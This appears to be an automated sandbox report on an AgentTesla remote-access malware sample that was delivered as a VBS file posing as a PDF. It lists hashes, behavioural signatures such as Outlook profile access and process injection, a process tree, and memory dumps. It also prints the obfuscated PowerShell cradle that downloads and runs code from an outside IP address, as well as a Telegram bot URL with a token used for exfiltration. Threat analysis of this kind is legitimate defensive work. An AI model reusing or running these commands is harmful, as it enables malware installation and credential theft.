Analysis
-
max time kernel
131s -
max time network
124s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
21-10-2021 21:38
Static task
static1
Behavioral task
behavioral1
Sample
183287857-050118-sanlccjavap0004-6561_PDF.vbs
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
183287857-050118-sanlccjavap0004-6561_PDF.vbs
Resource
win10-en-20211014
General
-
Target
183287857-050118-sanlccjavap0004-6561_PDF.vbs
-
Size
440B
-
MD5
fd5d9dd54f30ebeda49b3f3d9d57d1c6
-
SHA1
bdc86ae73f8ea542af15ed6a5643b1a9cfd8ea51
-
SHA256
75e81b26f76f0050408e59a9d3606e0ee6d474ffa9e2296187f582884fa2f59f
-
SHA512
60857407aa6143be42149dac675348dcbfaa1a9ed8dd66e66fe936dbabca8dd490d3019573fe940631741047e7edb0b0df9730a33ccaf48aed077e939608b7b9
Malware Config
Extracted
http://202.55.132.106/Bypass3.txt
Extracted
agenttesla
https://api.telegram.org/bot1923270472:AAFHljVp-f8Q5-X0iy70Vfe0aTch5THPa-U/sendDocument
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
AgentTesla Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/1776-150-0x000000000043774E-mapping.dmp family_agenttesla behavioral2/memory/1776-152-0x00000000009A0000-0x00000000009DC000-memory.dmp family_agenttesla behavioral2/memory/1776-156-0x0000000005330000-0x000000000582E000-memory.dmp family_agenttesla -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 10 2116 powershell.exe 24 2116 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
aspnet_compiler.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2116 set thread context of 1776 2116 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exeaspnet_compiler.exepid process 2116 powershell.exe 2116 powershell.exe 2116 powershell.exe 1776 aspnet_compiler.exe 1776 aspnet_compiler.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 2116 powershell.exe Token: SeDebugPrivilege 1776 aspnet_compiler.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
aspnet_compiler.exepid process 1776 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 3068 wrote to memory of 2116 3068 WScript.exe powershell.exe PID 3068 wrote to memory of 2116 3068 WScript.exe powershell.exe PID 2116 wrote to memory of 1776 2116 powershell.exe aspnet_compiler.exe PID 2116 wrote to memory of 1776 2116 powershell.exe aspnet_compiler.exe PID 2116 wrote to memory of 1776 2116 powershell.exe aspnet_compiler.exe PID 2116 wrote to memory of 1776 2116 powershell.exe aspnet_compiler.exe PID 2116 wrote to memory of 1776 2116 powershell.exe aspnet_compiler.exe PID 2116 wrote to memory of 1776 2116 powershell.exe aspnet_compiler.exe PID 2116 wrote to memory of 1776 2116 powershell.exe aspnet_compiler.exe PID 2116 wrote to memory of 1776 2116 powershell.exe aspnet_compiler.exe -
outlook_office_path 1 IoCs
Processes:
aspnet_compiler.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe -
outlook_win_path 1 IoCs
Processes:
aspnet_compiler.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\183287857-050118-sanlccjavap0004-6561_PDF.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" &('{1}{0}'-f'X','IE')(&('{1}{0}{2}' -f'je','New-Ob','ct') ('{1}{2}{0}' -f 'WebClient','Ne','t.')).('{2}{3}{1}{0}' -f'dString','nloa','D','ow').InVoKe('http://202.55.132.106/Bypass3.txt')2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1776-149-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/1776-160-0x00000000011D0000-0x00000000011D1000-memory.dmpFilesize
4KB
-
memory/1776-159-0x0000000006660000-0x0000000006661000-memory.dmpFilesize
4KB
-
memory/1776-158-0x0000000005F90000-0x0000000005F91000-memory.dmpFilesize
4KB
-
memory/1776-157-0x00000000053B0000-0x00000000053B1000-memory.dmpFilesize
4KB
-
memory/1776-156-0x0000000005330000-0x000000000582E000-memory.dmpFilesize
5.0MB
-
memory/1776-155-0x00000000053D0000-0x00000000053D1000-memory.dmpFilesize
4KB
-
memory/1776-154-0x0000000005830000-0x0000000005831000-memory.dmpFilesize
4KB
-
memory/1776-152-0x00000000009A0000-0x00000000009DC000-memory.dmpFilesize
240KB
-
memory/1776-150-0x000000000043774E-mapping.dmp
-
memory/2116-122-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmpFilesize
8KB
-
memory/2116-124-0x000001DAFF1E0000-0x000001DAFF1E1000-memory.dmpFilesize
4KB
-
memory/2116-127-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmpFilesize
8KB
-
memory/2116-131-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmpFilesize
8KB
-
memory/2116-132-0x000001DAFDE76000-0x000001DAFDE78000-memory.dmpFilesize
8KB
-
memory/2116-133-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmpFilesize
8KB
-
memory/2116-143-0x000001DAFF190000-0x000001DAFF1B4000-memory.dmpFilesize
144KB
-
memory/2116-148-0x000001DAFF1C0000-0x000001DAFF1C1000-memory.dmpFilesize
4KB
-
memory/2116-126-0x000001DAFDE73000-0x000001DAFDE75000-memory.dmpFilesize
8KB
-
memory/2116-125-0x000001DAFDE70000-0x000001DAFDE72000-memory.dmpFilesize
8KB
-
memory/2116-151-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmpFilesize
8KB
-
memory/2116-123-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmpFilesize
8KB
-
memory/2116-115-0x0000000000000000-mapping.dmp
-
memory/2116-121-0x000001DAFEE30000-0x000001DAFEE31000-memory.dmpFilesize
4KB
-
memory/2116-120-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmpFilesize
8KB
-
memory/2116-119-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmpFilesize
8KB
-
memory/2116-118-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmpFilesize
8KB
-
memory/2116-117-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmpFilesize
8KB
-
memory/2116-116-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmpFilesize
8KB